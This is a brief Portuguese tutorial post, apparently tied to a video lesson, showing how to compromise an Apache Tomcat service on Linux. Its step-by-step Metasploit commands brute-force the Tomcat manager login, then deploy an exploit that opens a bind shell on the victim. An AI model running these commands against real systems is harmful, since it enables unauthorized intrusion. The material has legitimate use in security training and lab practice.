Nessa aula mostro como explorar um serviço rodando em um micro Linux. O serviço era do apache tomcat. Para maiores informações do mesmo Apache Tomcat - Wikipédia, a enciclopédia livre

O que eu fiz?
Escanei o host com o Nmap,
verifiquei os serviço,
fiz um scanner com o metasploit para verifica vulnerabilidade do login, peguei o login e senha e injetei o exploit.

Comandos:
nmap -sV host
use scanner/http/tomcat_mgr_login
set rhost Ip_da_vitima
set rport 8180
exploit

use multi/http/tomcat_mgr_deploy
set rhost Ip_da_vitima
set username Login_capturado
set passwoer Senha_capturada
set rport 8180
set payload linux/x86/shell_bind_tcp
exploit
Programas usados:
Metasploit -> Metasploit Penetration Testing Framework
Nmap -> Download the Free Nmap Security Scanner for Linux/MAC/UNIX or Windows

Manual do nmap em português

Baixar:
Assisti on-line: